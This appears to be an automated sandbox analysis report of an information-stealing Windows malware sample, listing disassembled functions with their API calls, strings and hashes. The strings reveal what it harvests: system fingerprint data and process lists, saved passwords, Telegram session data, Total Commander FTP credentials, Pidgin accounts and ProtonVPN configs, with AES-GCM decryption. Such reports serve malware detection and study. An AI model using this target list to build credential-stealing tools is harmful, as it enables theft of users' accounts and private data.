tSet, xrefs: 00D93237
e, xrefs: 00D93212
penA, xrefs: 00D93171
e, xrefs: 00D932D8
vh, xrefs: 00D931EA
u, xrefs: 00D9315D
e, xrefs: 00D9318E
eS, xrefs: 00D93283
thmP, xrefs: 00D93184
u, xrefs: 00D932C2
smsv, xrefs: 00D93134
ricK, xrefs: 00D9328F
e, xrefs: 00D932F4
mz, xrefs: 00D9320C
zw, xrefs: 00D9313B
h, xrefs: 00D932EA
ChainingModeGCM, xrefs: 00D93422
ii, xrefs: 00D93359
e, xrefs: 00D93222
ri, xrefs: 00D93219
c, xrefs: 00D93229
sk, xrefs: 00D93350
n, xrefs: 00D932F8
r, xrefs: 00D93154
Ge, xrefs: 00D93279
C:\\Windows\\SysWOW64\\, xrefs: 00D93323
q, xrefs: 00D9327F
r, xrefs: 00D932FF
zg, xrefs: 00D932CF
AES, xrefs: 00D933FF
faei, xrefs: 00D9312A
k, xrefs: 00D93299
wzmk, xrefs: 00D93349
p, xrefs: 00D9324B
r, xrefs: 00D93265
vzgc, xrefs: 00D93272
vuwz, xrefs: 00D93230

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: CombineLibraryLoadPath
String ID: AES$BC$BCr$BCr$BCry$C:\\Windows\\SysWOW64\\$ChainingMode$ChainingModeGCM$Decr$Ge$Pr$a$as$c$ca$cjaf$e$e$e$e$e$eS$er$er$faei$h$hs$ii$ik$k$lg$m$mm$my$mz$n$p$p$penA$q$r$r$r$r$r$ri$ricK$sk$smsv$tSet$thmP$u$u$vh$vi$vuwz$vzgc$wzmk$y$yptO$zg$zw
API String ID: 2383821573-319735608
Opcode ID: 2ea4e9b218aede6e75055768eb98a15c6b1f18ee45045ef16be8ac6d7824003d
Instruction ID: fb0727550494b12b4fd0fdb899a0be53afba52bbab3cd097e59f3cbdd6c6f2fd
Opcode Fuzzy Hash: 2ea4e9b218aede6e75055768eb98a15c6b1f18ee45045ef16be8ac6d7824003d
Instruction Fuzzy Hash: FCE16D21D593A8DADF21CFA89C45BDDBB75AF11700F0440DAD448BB3A2D7B11A84CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00D9723D, Relevance: 112.3, APIs: 1, Strings: 63, Instructions: 300libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00D975D6

Strings

h, xrefs: 00D97490
umer, xrefs: 00D97430
h, xrefs: 00D9738B
e, xrefs: 00D974C7
l, xrefs: 00D9747D
l, xrefs: 00D97514
m, xrefs: 00D97586
ul, xrefs: 00D974CB
h, xrefs: 00D97378
q, xrefs: 00D974D1
z, xrefs: 00D973EB
m, xrefs: 00D973EF
Vau, xrefs: 00D9763E, 00D97641
Fr, xrefs: 00D974A5
ac, xrefs: 00D97401
l, xrefs: 00D9745A
c, xrefs: 00D975AB
V, xrefs: 00D97560
e, xrefs: 00D974AF
d, xrefs: 00D97468
em, xrefs: 00D9739E
wcyr, xrefs: 00D974E6
En, xrefs: 00D9733E
ukuf, xrefs: 00D9740A
hy, xrefs: 00D97414
Vau, xrefs: 00D97607, 00D9760D
u, xrefs: 00D973F3
e, xrefs: 00D975A7
e, xrefs: 00D97497
Cl, xrefs: 00D9752B
fi, xrefs: 00D97347
wk, xrefs: 00D97366
r, xrefs: 00D973FA
enVa, xrefs: 00D974BD
o, xrefs: 00D97572
hj, xrefs: 00D9735D
c, xrefs: 00D975B2
gz, xrefs: 00D9758C
m, xrefs: 00D974B3
mzlo, xrefs: 00D9741D
yc, xrefs: 00D9757D
l, xrefs: 00D974DB
l, xrefs: 00D974AB
ay, xrefs: 00D97392
f, xrefs: 00D97444
En, xrefs: 00D9744B
mqck, xrefs: 00D9750D
o, xrefs: 00D9756B
Vaul, xrefs: 00D975E8, 00D975EE
eVau, xrefs: 00D9743A
eI, xrefs: 00D97382
yi, xrefs: 00D974D5
hyfn, xrefs: 00D9751E
mera, xrefs: 00D97331
V, xrefs: 00D975A3
Ge, xrefs: 00D9759A
Vaul, xrefs: 00D97624, 00D97627
l, xrefs: 00D97576
I, xrefs: 00D97596
O, xrefs: 00D974ED
l, xrefs: 00D97592
eV, xrefs: 00D97501
a, xrefs: 00D97461

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: Cl$En$En$Fr$Ge$I$O$V$V$Vau$Vau$Vaul$Vaul$a$ac$ay$c$c$d$e$e$e$e$eI$eV$eVau$em$enVa$f$fi$gz$h$h$h$hj$hy$hyfn$l$l$l$l$l$l$l$m$m$m$mera$mqck$mzlo$o$o$q$r$u$ukuf$ul$umer$wcyr$wk$yc$yi$z
API String ID: 1029625771-773044139
Opcode ID: a7d754cdbd667ce506fabaa47b1881d2af769e8a7a163cc31f188369f5de433a
Instruction ID: 96c3494f3d06554f86ee7408ed361cb27a01bab4345d69de729e7c58d75ce0d5
Opcode Fuzzy Hash: a7d754cdbd667ce506fabaa47b1881d2af769e8a7a163cc31f188369f5de433a
Instruction Fuzzy Hash: 08E130219593D8DDEB11CBA8D9457DDBF71AF22700F1440DED088BB392D6750A84CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 00D35A75, Relevance: 91.3, APIs: 35, Strings: 17, Instructions: 271stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96D36: RegOpenKeyExW.KERNELBASE ref: 00D96D57
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96D7B
Part of subcall function 00D96D36: GlobalAlloc.KERNEL32(00000040,?), ref: 00D96D8B
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96DBB

GetSystemWow64DirectoryW.KERNEL32(00000000,00000000,ProductName,?,?,00000000,767F8B40,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35AC8
wsprintfA.USER32 ref: 00D35AF0
GlobalFree.KERNEL32 ref: 00D35AFF
lstrlenA.KERNEL32(?), ref: 00D35B0C
wsprintfW.USER32 ref: 00D35B44
lstrlenW.KERNEL32(?,?), ref: 00D35B5B
lstrcpyW.KERNEL32 ref: 00D35B81
lstrlenW.KERNEL32(?,?,00000000,767F8B40,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35B8E
lstrlenW.KERNEL32(?,00000400,?,00000000,767F8B40,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35BA3
GetUserDefaultLocaleName.KERNEL32(00000000,?,00000000,767F8B40,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35BB3
lstrcatW.KERNEL32(?,00DCEFB0), ref: 00D35BC6
lstrlenW.KERNEL32(?,?,?,00000000,767F8B40,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35BDA
lstrcpyW.KERNEL32 ref: 00D35C0A
lstrlenW.KERNEL32(?,000003F2,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35C1E
GetComputerNameW.KERNEL32 ref: 00D35C2E
lstrcatW.KERNEL32(?,00DCEFB0), ref: 00D35C3C
lstrlenW.KERNEL32(?,?,?,00D3485F,SourceModInstallPath,?,00000000), ref: 00D35C50
GetCurrentHwProfileA.ADVAPI32 ref: 00D35C7F
lstrlenA.KERNEL32(?), ref: 00D35C8C
wsprintfW.USER32 ref: 00D35CC5
lstrlenW.KERNEL32(?,?), ref: 00D35CDC
GetSystemMetrics.USER32 ref: 00D35CF8
GetSystemMetrics.USER32 ref: 00D35D00
wsprintfW.USER32 ref: 00D35D13
lstrlenW.KERNEL32(?,?), ref: 00D35D2A
GlobalMemoryStatusEx.KERNELBASE(?), ref: 00D35D6F
wsprintfW.USER32 ref: 00D35D92
GlobalFree.KERNEL32 ref: 00D35DA1
lstrlenW.KERNEL32(?,?,?,?,ProcessorNameString,?), ref: 00D35DB5
lstrcpyW.KERNEL32 ref: 00D35DDB
lstrlenW.KERNEL32(?), ref: 00D35DE8
EnumDisplayDevicesW.USER32 ref: 00D35E0B
lstrcpyW.KERNEL32 ref: 00D35E19
lstrcatW.KERNEL32(?,Process list:), ref: 00D35E2B
lstrlenW.KERNEL32(?,?), ref: 00D35E3F

Strings

ProcessorNameString, xrefs: 00D35D51
x64, xrefs: 00D35AD5, 00D35AE3
@, xrefs: 00D35D67
Screen resolution: %dx%d, xrefs: 00D35D0D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00D35AA7
CPU: %sRAM: %lu MB, xrefs: 00D35D8C
%S %s, xrefs: 00D35AEA
Locale: , xrefs: 00D35B75
x32, xrefs: 00D35AD0
GPU: , xrefs: 00D35DCF
Process list:, xrefs: 00D35E1F
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00D35D4B
Operation system: %S, xrefs: 00D35B3E
ProductName, xrefs: 00D35AAD
HWID: %S, xrefs: 00D35CBF
PC name: , xrefs: 00D35BF4
info.txt, xrefs: 00D35A90

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$Globallstrcpy$Systemlstrcat$FreeMetricsNameQueryValue$AllocComputerCurrentDefaultDevicesDirectoryDisplayEnumLocaleMemoryOpenProfileStatusUserWow64
String ID: Process list:$%S %s$@$CPU: %sRAM: %lu MB$GPU: $HARDWARE\DESCRIPTION\System\CentralProcessor\0$HWID: %S$Locale: $Operation system: %S$PC name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Screen resolution: %dx%d$info.txt$x32$x64
API String ID: 4198289941-1927036191
Opcode ID: a7d69647cd2fcbb049b77dd54b94f9d9a2167a0f96bbdbd3f59eb5f2d5ec4f00
Instruction ID: 444c74e1307256641e31c7ab4f9072e876b4ebb1b590e0f02d37b0cd75c0384b
Opcode Fuzzy Hash: a7d69647cd2fcbb049b77dd54b94f9d9a2167a0f96bbdbd3f59eb5f2d5ec4f00
Instruction Fuzzy Hash: 9EB1DAB2900229EBDF15AB60DC49EDA77BCFF44304F408695B50AE2151DF34AB899FB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D93A1F, Relevance: 46.4, APIs: 19, Strings: 7, Instructions: 920memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D937F4: StrStrW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D93815
Part of subcall function 00D937F4: PathFindNextComponentW.SHLWAPI(?,767F84F0,00000000,00000000,00000000,?,00D36336), ref: 00D9384A

Part of subcall function 00D9394C: StrStrW.SHLWAPI(?,?), ref: 00D939EE
Part of subcall function 00D9394C: StrChrW.SHLWAPI(?,?), ref: 00D93A05

wsprintfA.USER32 ref: 00D94347
GlobalFree.KERNEL32 ref: 00D943F0
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,00000000), ref: 00D94423
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D9444A
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D9446B
GlobalFree.KERNEL32 ref: 00D945FF

Part of subcall function 00D9388D: GlobalAlloc.KERNEL32(00000040,00007FFF), ref: 00D938A4
Part of subcall function 00D9388D: StrStrA.SHLWAPI(?,v10), ref: 00D938C6
Part of subcall function 00D9388D: GlobalFree.KERNEL32 ref: 00D938FB

lstrlenA.KERNEL32(?), ref: 00D94527
lstrlenA.KERNEL32(?), ref: 00D9453B
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D94557
wsprintfW.USER32 ref: 00D9457C
lstrlenW.KERNEL32(00000000,?), ref: 00D94593
lstrlenW.KERNEL32(00000000,?), ref: 00D945BA

Part of subcall function 00D24EBA: __aullrem.LIBCMT ref: 00D24F5C
Part of subcall function 00D24EBA: __aulldiv.LIBCMT ref: 00D24F76

GlobalFree.KERNEL32 ref: 00D945D1
GlobalFree.KERNEL32 ref: 00D945E3
GlobalFree.KERNEL32 ref: 00D945EA
GlobalFree.KERNEL32 ref: 00D945F6
GlobalFree.KERNEL32 ref: 00D9460A
GlobalFree.KERNEL32 ref: 00D94615
GlobalFree.KERNEL32 ref: 00D94651

Strings

%d%s%s%S, xrefs: 00D94576
i, xrefs: 00D93BB5
%, xrefs: 00D93BAA
%, xrefs: 00D93AEB
passwords_all.txt, xrefs: 00D942CD
b, xrefs: 00D93BAE
., xrefs: 00D93AEF

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$lstrlen$wsprintf$ComponentFindNextPath__aulldiv__aullrem
String ID: %$%$%d%s%s%S$.$b$i$passwords_all.txt
API String ID: 1015951437-2160955094
Opcode ID: 9839628d3777584354c32400d829349347898b2cf4e0ba62e24a2971df78c1df
Instruction ID: f572906705be17234c78dd3162483554302b7c766a2f61630d232d12784e7513
Opcode Fuzzy Hash: 9839628d3777584354c32400d829349347898b2cf4e0ba62e24a2971df78c1df
Instruction Fuzzy Hash: A6722735A54398D9EB208BA09C11BFDB731EF55750F1054DAE50CEF2A1E6B20EC4CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A6A8, Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96D36: RegOpenKeyExW.KERNELBASE ref: 00D96D57
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96D7B
Part of subcall function 00D96D36: GlobalAlloc.KERNEL32(00000040,?), ref: 00D96D8B
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96DBB

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

PathCombineW.SHLWAPI(?,00000073,00000068,?), ref: 00D9A72C

Part of subcall function 00D96B54: lstrlenW.KERNEL32(00000000,767F8B40,00D9A735,?,00000073,00000068,?), ref: 00D96B58

GlobalFree.KERNEL32 ref: 00D9A73B
lstrcpyW.KERNEL32 ref: 00D9A747
lstrlenW.KERNEL32(00000000,?,00000073,00000068,?), ref: 00D9A74E
wsprintfW.USER32 ref: 00D9A762
lstrlenW.KERNEL32(00000000,?,?,?), ref: 00D9A76C
lstrcpyW.KERNEL32 ref: 00D9A77B

Part of subcall function 00D96806: CreateFileW.KERNELBASE ref: 00D96845
Part of subcall function 00D96806: GetFileSize.KERNEL32(00000000,00000000), ref: 00D96858
Part of subcall function 00D96806: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D96863
Part of subcall function 00D96806: PathFindNextComponentW.SHLWAPI ref: 00D968B9

lstrcatW.KERNEL32(?,00DCEEA0), ref: 00D9A7A8
IsCharUpperW.USER32(?,?,?,?,?,?,?), ref: 00D9A82A
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00D9A87F
__fassign.LIBCMT ref: 00D9A88E
lstrcpyW.KERNEL32 ref: 00D9A8FE
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D9A947
lstrcpyW.KERNEL32 ref: 00D9A952
lstrcatW.KERNEL32(00000000,00DCEEBC), ref: 00D9A96B
GlobalFree.KERNEL32 ref: 00D9A988
GlobalFree.KERNEL32 ref: 00D9A98F

Strings

tdata, xrefs: 00D9A71A
InstallLocation, xrefs: 00D9A6C8
Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1, xrefs: 00D9A6CD
tdata\, xrefs: 00D9A741
key_datas, xrefs: 00D9A754, 00D9A772
\%s, xrefs: 00D9A759

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Globallstrcpy$lstrlen$AllocFree$FilePathQueryValuelstrcat$CharCombineComponentCreateFindNextOpenSizeUpper__fassignwsprintf
String ID: InstallLocation$Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1$\%s$key_datas$tdata$tdata\
API String ID: 2205108001-1465441950
Opcode ID: 4b7cdaa7ae14b4f21f129406be861c911e493327883e982a448ff23d0e8d623c
Instruction ID: 8a44a63d86e03084810b223752477eac0299c28a6fdb44d6df828048f901c29e
Opcode Fuzzy Hash: 4b7cdaa7ae14b4f21f129406be861c911e493327883e982a448ff23d0e8d623c
Instruction Fuzzy Hash: 6F718071900629DBCF20AF64AC49BAE77B9EF44741F400599E80AE3250DB349E85DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D97F8A, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

PathCombineW.SHLWAPI ref: 00D97FD3

Part of subcall function 00D96B54: lstrlenW.KERNEL32(00000000,767F8B40,00D9A735,?,00000073,00000068,?), ref: 00D96B58

CreateFileW.KERNELBASE ref: 00D97FFB
GetFileSize.KERNEL32(00000000,00000000), ref: 00D98010
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D98027
GlobalFree.KERNEL32 ref: 00D981EA

Part of subcall function 00D969B2: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00D969D8
Part of subcall function 00D969B2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,00000000,00000000), ref: 00D969EA
Part of subcall function 00D969B2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D96A03

GlobalFree.KERNEL32 ref: 00D98096
GlobalFree.KERNEL32 ref: 00D9809D
lstrlenW.KERNEL32(?,?), ref: 00D98112
lstrlenW.KERNEL32(?), ref: 00D9811D
lstrlenW.KERNEL32(?), ref: 00D98127
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D98139
wsprintfW.USER32 ref: 00D98157
GlobalFree.KERNEL32 ref: 00D98167
lstrlenW.KERNEL32(?,?), ref: 00D98183
GlobalFree.KERNEL32 ref: 00D9819A
GlobalFree.KERNEL32 ref: 00D981DE
GlobalFree.KERNEL32 ref: 00D98208

Strings

%s%s%s, xrefs: 00D98151
GHISLER\wcx_ftp.ini, xrefs: 00D97FC1
TCM.txt, xrefs: 00D980E3

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrlen$Alloc$Filelstrcpy$ByteCharCombineCreateMultiPathSizeTextUnicodeWidewsprintf
String ID: %s%s%s$GHISLER\wcx_ftp.ini$TCM.txt
API String ID: 3527101223-1574043046
Opcode ID: 8591ae3028cafc66778c4e514b0f8041a3460c1a0af531f84cd66f86b1e25621
Instruction ID: 4f99f6aae3acdddf4716f248e80df0d57ee4379cf91bdcd29169b882852b9374
Opcode Fuzzy Hash: 8591ae3028cafc66778c4e514b0f8041a3460c1a0af531f84cd66f86b1e25621
Instruction Fuzzy Hash: 92612931A00325DBDF21AF24DC49A9ABB79EF46714F044295E90AE3260DF319E85EF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A9B2, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 167filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

PathCombineW.SHLWAPI ref: 00D9AA1B
CreateFileW.KERNELBASE ref: 00D9AA5D
GetFileSize.KERNEL32(00000000,00000000), ref: 00D9AA72
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D9AA81
GlobalFree.KERNEL32 ref: 00D9ABF0

Part of subcall function 00D969B2: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00D969D8
Part of subcall function 00D969B2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,00000000,00000000), ref: 00D969EA
Part of subcall function 00D969B2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D96A03

GlobalFree.KERNEL32 ref: 00D9AAEC
CloseHandle.KERNEL32(?), ref: 00D9AAF8
wsprintfW.USER32 ref: 00D9AB76
lstrlenW.KERNEL32(00000000,?), ref: 00D9AB87
GlobalFree.KERNEL32 ref: 00D9ABBB
GlobalFree.KERNEL32 ref: 00D9ABCF
GlobalFree.KERNEL32 ref: 00D9ABE9
CloseHandle.KERNEL32(00000000), ref: 00D9ABFD
GlobalFree.KERNEL32 ref: 00D9AC0F

Strings

%s%s%s%s, xrefs: 00D9AB70
.purple\accounts.xml, xrefs: 00D9AA09
pidgin.txt, xrefs: 00D9A9D2

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$CloseFileHandlelstrcpy$ByteCharCombineCreateMultiPathSizeTextUnicodeWidelstrlenwsprintf
String ID: %s%s%s%s$.purple\accounts.xml$pidgin.txt
API String ID: 333361556-292254744
Opcode ID: 6b63e96fd0b76b8c9ae794a1351eed397fae0ef6249db22570742f72109b3db3
Instruction ID: 52f93218a5119d85a8a77af58a26b394948d3a53ab7d00d760dfccf27f1c9073
Opcode Fuzzy Hash: 6b63e96fd0b76b8c9ae794a1351eed397fae0ef6249db22570742f72109b3db3
Instruction Fuzzy Hash: 75516072B00329DBDF219F68DC49A9EB7B5EF4A314F044595E909A2650DB309E40DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D35884, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 140stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

PathCombineW.SHLWAPI ref: 00D358C9

Part of subcall function 00D96B54: lstrlenW.KERNEL32(00000000,767F8B40,00D9A735,?,00000073,00000068,?), ref: 00D96B58

lstrcatW.KERNEL32(00000000,00DCEEA0), ref: 00D358D8
wsprintfW.USER32 ref: 00D358EB
lstrcmpW.KERNEL32(?,00DCEEB0), ref: 00D3592B
lstrcmpW.KERNEL32(?,00DCEEB4), ref: 00D35941
StrStrW.SHLWAPI ref: 00D35966
lstrcatW.KERNEL32(?,?), ref: 00D359AF
lstrcatW.KERNEL32(?,00DCEEBC), ref: 00D359C2
lstrcatW.KERNEL32(?,?), ref: 00D359E6
lstrcatW.KERNEL32(?,00DCEEBC), ref: 00D359F8

Part of subcall function 00D96506: lstrlenW.KERNEL32(00000000,0000005C,?,6B86F820,00D9A965,?,?,?,?,?,?), ref: 00D9650F
Part of subcall function 00D96506: StrRChrW.SHLWAPI(?,?,?,?,?,?), ref: 00D96528
Part of subcall function 00D96506: lstrcpyW.KERNEL32 ref: 00D96535

lstrcatW.KERNEL32(00000000,00DCEEA0), ref: 00D35A11
lstrcatW.KERNEL32(?,user.config), ref: 00D35A44
lstrcatW.KERNEL32(00000000,user.config), ref: 00D35A4C
GlobalFree.KERNEL32 ref: 00D35A60

Strings

%s\, xrefs: 00D358E5
user.config, xrefs: 00D35A37, 00D35A42, 00D35A4A
ProtonVPN, xrefs: 00D358BB, 00D358DE

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$lstrcpy$Globallstrcmplstrlen$AllocCombineFreePathwsprintf
String ID: %s\$ProtonVPN$user.config
API String ID: 3548063556-2478952039
Opcode ID: 86d9a11b0b1d6717031728eb85b3b949bbfa3c8832512bedda6723cf385a1a8e
Instruction ID: a1766c45771d45824bbb2c0270911955e87324d64d65a9cb85a8d6f02f051dea
Opcode Fuzzy Hash: 86d9a11b0b1d6717031728eb85b3b949bbfa3c8832512bedda6723cf385a1a8e
Instruction Fuzzy Hash: AF516DB1A00329EBCF10AF60DD88AAE777DAF45354F04019AA509E3254EB70AF44DF74

Uniqueness

Uniqueness Score: -1.00%

Function 00D9AC31, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 180stringfilememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9AC86
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9AC9B
GlobalAlloc.KERNEL32(00000040,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9ACAA
GlobalFree.KERNEL32 ref: 00D9AECA

Part of subcall function 00D969B2: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00D969D8
Part of subcall function 00D969B2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,00000000,00000000), ref: 00D969EA
Part of subcall function 00D969B2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D96A03

GlobalFree.KERNEL32 ref: 00D9AD15
CloseHandle.KERNEL32(?,?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9AD21
lstrlenW.KERNEL32(?,00000002,?,?,?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9ADC6
wsprintfW.USER32 ref: 00D9AE35
lstrlenW.KERNEL32(?,?), ref: 00D9AE46
GlobalFree.KERNEL32 ref: 00D9AE8D
GlobalFree.KERNEL32 ref: 00D9AE9E
GlobalFree.KERNEL32 ref: 00D9AEC3
CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,767F8B40,00000000,?,00D345ED), ref: 00D9AED7

Strings

PSI.txt, xrefs: 00D9AD5A
%s%s, xrefs: 00D9AE2F

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
